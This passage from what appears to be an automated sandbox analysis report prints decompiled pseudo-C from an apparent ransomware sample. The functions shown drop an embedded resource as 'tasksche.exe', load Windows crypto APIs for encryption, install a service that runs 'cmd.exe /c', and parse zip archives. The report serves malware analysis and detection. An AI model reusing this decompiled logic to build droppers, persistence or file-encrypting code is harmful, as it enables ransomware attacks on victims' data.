														 *0x43144c(_v692);
														 *0x43144c(_v700);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






























                    0x00407cf5
                    0x00407cfb
                    0x00407d15
                    0x00407d22
                    0x00407d2f
                    0x00407d34
                    0x00407d36
                    0x00407d3c
                    0x00407d43
                    0x00407d49
                    0x00407d4f
                    0x00407d55
                    0x00407d5b
                    0x00407d7a
                    0x00407d7e
                    0x00407d86
                    0x00407d8e
                    0x00407d95
                    0x00407d9d
                    0x00407da1
                    0x00407daf
                    0x00407db3
                    0x00407dc4
                    0x00407dc8
                    0x00407dca
                    0x00407dcc
                    0x00407ddb
                    0x00407de2
                    0x00407def
                    0x00407df1
                    0x00407e01
                    0x00407e18
                    0x00407e2c
                    0x00407e49
                    0x00407e4e
                    0x00407e61
                    0x00407e68
                    0x00407e72
                    0x00407e7a
                    0x00407e82
                    0x00407e8b
                    0x00407e95
                    0x00407e9b
                    0x00407e9f
                    0x00407ea8
                    0x00407eb0
                    0x00407ebb
                    0x00407ebc
                    0x00407ec6
                    0x00407ec7
                    0x00407ec8
                    0x00407ec9
                    0x00407ece
                    0x00407ecf
                    0x00407ed0
                    0x00407ed1
                    0x00407ed2
                    0x00407ed3
                    0x00407edb
                    0x00407ee0
                    0x00407ef0
                    0x00407ef7
                    0x00407f02
                    0x00407f02
                    0x00407ef0
                    0x00407e4e
                    0x00407db3
                    0x00407da1
                    0x00407d8e
                    0x00407d7e
                    0x00407d5b
                    0x00407d4f
                    0x00407d43
                    0x00407f14

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FFFFB10,?,00000000), ref: 00407CEF
                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                    • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                    • sprintf.MSVCRT ref: 00407E01
                    • sprintf.MSVCRT ref: 00407E18
                    • MoveFileExA.KERNEL32 ref: 00407E2C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.575658482.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.575654169.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575666835.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575671464.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575679019.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575701260.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575706917.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575885693.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
                    • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                    • API String ID: 4072214828-1507730452
                    • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                    • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}


















































                    0x00406c40
                    0x00406c40
                    0x00406c4c
                    0x00406c4f
                    0x00406c52
                    0x00406c56
                    0x00406c59
                    0x00407064
                    0x00000000
                    0x00407064
                    0x00406c5f
                    0x00406c64
                    0x00000000
                    0x00000000
                    0x00406c6d
                    0x00406c70
                    0x00406c75
                    0x00406c75
                    0x00406c7c
                    0x00406c7f
                    0x00406ca0
                    0x00406cec
                    0x00406cf1
                    0x00406cfa
                    0x00406cfa
                    0x00406cff
                    0x00406d21
                    0x00406d3e
                    0x00406d52
                    0x00406d5c
                    0x00406d89
                    0x00000000
                    0x00406d89
                    0x00406d5e
                    0x00406d61
                    0x00406d68
                    0x00406d7e
                    0x00406d95
                    0x00406d9b
                    0x00406dab
                    0x00406db0
                    0x00406db8
                    0x00406dbe
                    0x00406dbe
                    0x00406dbe
                    0x00406dc2
                    0x00000000
                    0x00000000
                    0x00406dd0
                    0x00406dd6
                    0x00000000
                    0x00406dd9
                    0x00406ddf
                    0x00406de5
                    0x00406e11
                    0x00406e11
                    0x00406e11
                    0x00000000
                    0x00406e11
                    0x00406ded
                    0x00406df3
                    0x00000000
                    0x00000000
                    0x00406dfb
                    0x00406e01
                    0x00000000
                    0x00000000
                    0x00406e09
                    0x00406e0f
                    0x00406e1b
                    0x00406e20
                    0x00406e28
                    0x00406e2c
                    0x00406e3c
                    0x00406e3e
                    0x00406e41
                    0x00406e44
                    0x00406e46
                    0x00406e61
                    0x00406e6b
                    0x00406e6d
                    0x00406e78
                    0x00406e7a
                    0x00406e7c
                    0x00406e7c
                    0x00406e7e
                    0x00406e82
                    0x00406e88
                    0x00406e8a
                    0x00406e8a
                    0x00406e96
                    0x00406e98
                    0x00406e98
                    0x00406ea3
                    0x00406ea5
                    0x00406ea5
                    0x00406eae
                    0x00406eb0
                    0x00406eb0
                    0x00406ebb
                    0x00406ebd
                    0x00406ebd
                    0x00406eca
                    0x00406ed3
                    0x00406ee6
                    0x00406ef2
                    0x00406ef5
                    0x00406efb
                    0x00406efe
                    0x00406f05
                    0x00406f08
                    0x00406f0e
                    0x00406f14
                    0x00406f1a
                    0x00406f20
                    0x00406f26
                    0x00406f2c
                    0x00407037
                    0x00407039
                    0x0040703b
                    0x0040703c
                    0x00407041
                    0x00407048
                    0x0040704f
                    0x0040705a
                    0x00000000
                    0x00406f32
                    0x00406f32
                    0x00406f3a
                    0x00406f41
                    0x00406f45
                    0x00406f4d
                    0x00406f5d
                    0x00000000
                    0x00000000
                    0x00406f62
                    0x00406f6c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406f6e
                    0x00406f73
                    0x00406f81
                    0x00406f86
                    0x00406f89
                    0x00406f8f
                    0x00406f92
                    0x00406f94
                    0x00406f99
                    0x00406f9e
                    0x00406fba
                    0x00406fc0
                    0x00406fc4
                    0x00406fc4
                    0x00406fcc
                    0x00406fce
                    0x00406fd3
                    0x00406fd8
                    0x00406ff4
                    0x00406ffb
                    0x00406ffb
                    0x00407005
                    0x00407007
                    0x0040702a
                    0x00407031
                    0x00407031
                    0x00000000
                    0x00407005
                    0x00406f2c
                    0x00000000
                    0x00406e0f
                    0x00406dd0
                    0x00406dcb
                    0x00000000
                    0x00406dcb
                    0x00406d80
                    0x00406d83
                    0x00000000
                    0x00406d88
                    0x00000000
                    0x00406d40
                    0x00406d02
                    0x00406cf9
                    0x00406cf9
                    0x00000000
                    0x00406cf9
                    0x00406cf4
                    0x00000000
                    0x00406cf4
                    0x00000000
                    0x00406c81
                    0x00406c83
                    0x00406ca2
                    0x00406ca7
                    0x00406caa
                    0x00406cae
                    0x00406cb1
                    0x00406cb7
                    0x00406cbd
                    0x00406cc3
                    0x00406cc9
                    0x00406ccf
                    0x00406cd5
                    0x00406cdb
                    0x00406ce1
                    0x00407060
                    0x00000000
                    0x00407060
                    0x00406c91
                    0x00000000
                    0x00406c96

                    APIs
                    • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: memcpy
                    • String ID: /../$/..\$\../$\..\
                    • API String ID: 3510742995-3885502717
                    • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                    • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                    • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                    • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}












                    0x00401a48
                    0x00401a4f
                    0x00401aec
                    0x00401aee
                    0x00000000
                    0x00401aee
                    0x00401a60
                    0x00401a64
                    0x00401af1
                    0x00000000
                    0x00401af1
                    0x00401a7f
                    0x00401a8c
                    0x00401a99
                    0x00401aa6
                    0x00401ab3
                    0x00401ab8
                    0x00401aba
                    0x00401ac0
                    0x00401ac6
                    0x00000000
                    0x00000000
                    0x00401ac8
                    0x00401ace
                    0x00000000
                    0x00000000
                    0x00401ad0
                    0x00401ad6
                    0x00000000
                    0x00000000
                    0x00401ad8
                    0x00401ade
                    0x00000000
                    0x00000000
                    0x00401ae0
                    0x00401ae6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                    • API String ID: 2238633743-2459060434
                    • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                    • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                    • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                    • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}











                    0x00401cfb
                    0x00401cfe
                    0x00401d06
                    0x00401d09
                    0x00401d21
                    0x00401d29
                    0x00401d2c
                    0x00401d54
                    0x00401d7b
                    0x00401d7f
                    0x00401d84
                    0x00401d8b
                    0x00401d91
                    0x00401d91
                    0x00401d98
                    0x00401d2e
                    0x00401d31
                    0x00401d3a
                    0x00401d42
                    0x00401d42
                    0x00401d9e
                    0x00000000
                    0x00401da7
                    0x00000000

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                    • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                    • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                    • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$ManagerStart
                    • String ID: cmd.exe /c "%s"
                    • API String ID: 1485051382-955883872
                    • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                    • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                    • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                    • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
